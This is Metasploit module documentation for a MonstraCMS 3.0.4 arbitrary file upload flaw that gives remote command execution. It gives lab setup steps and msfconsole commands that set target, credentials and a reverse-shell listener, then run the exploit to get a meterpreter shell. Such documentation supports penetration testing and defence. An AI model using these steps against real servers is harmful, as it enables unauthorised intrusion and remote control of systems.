metasploit-gs/documentation/modules/exploit/multi/http/monstra_fileupload_exec.md

Description

MonstraCMS 3.0.4 allows users to upload Arbitrary files which leads to a remote command execution on the remote server, an attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. This module was tested against MonstraCMS 3.0.4. Additional information and vulnerabilities can be viewed on Exploit-DB 43348.

Vulnerable Application

Available at Exploit-DB

Vulnerable Application Installation Setup.

1. Download Application : https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip
2. Extract : 23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip
3. Move In WebDirectory : C:\xampp\htdocs\
4. Now Visit : http://localhost/
5. Setup DB creds and other thins which is essential for Monstra CMS.

Verification Steps

1. Install the application
2. Start msfconsole
3. Do: use exploit/multi/http/monstra_fileupload_exec
4. Do: set rport <port>
5. Do: set rhost <ip>
6. Do: set targeturi monstra
7. Do: set username root
8. Do: set password password
9. Do: check

[*] 10.22.1.10:80 The target appears to be vulnerable.

10. Do: set lport <port>
11. Do: set lhost <ip>
12. Do: exploit
13. You should get a shell.

Scenarios

Monstra CMS on Windows Target

meterpreter >